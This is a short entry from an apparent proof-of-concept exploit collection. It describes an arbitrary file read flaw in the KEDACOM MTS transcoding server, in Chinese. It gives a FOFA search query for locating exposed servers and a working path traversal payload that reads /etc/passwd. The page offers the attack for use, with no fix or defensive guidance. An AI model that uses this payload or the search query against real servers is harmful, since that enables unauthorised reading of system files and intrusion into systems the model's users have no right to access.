Awesome-POC/Web应用漏洞/科达 MTS转码服务器 任意文件读取漏洞.md
2022-05-25 15:32:50 +08:00

554 B
Raw Blame History

科达 MTS转码服务器 任意文件读取漏洞

漏洞描述

KEDACOM MTS转码服务器存在任意文件读取漏洞攻击这通过漏洞可以读取服务器任意信息

漏洞影响

MTS转码服务器

FOFA

app="MTS转码服务器"

漏洞复现

登录页面

image-20220525145422524

验证POC

/../../../../../../../../etc/passwd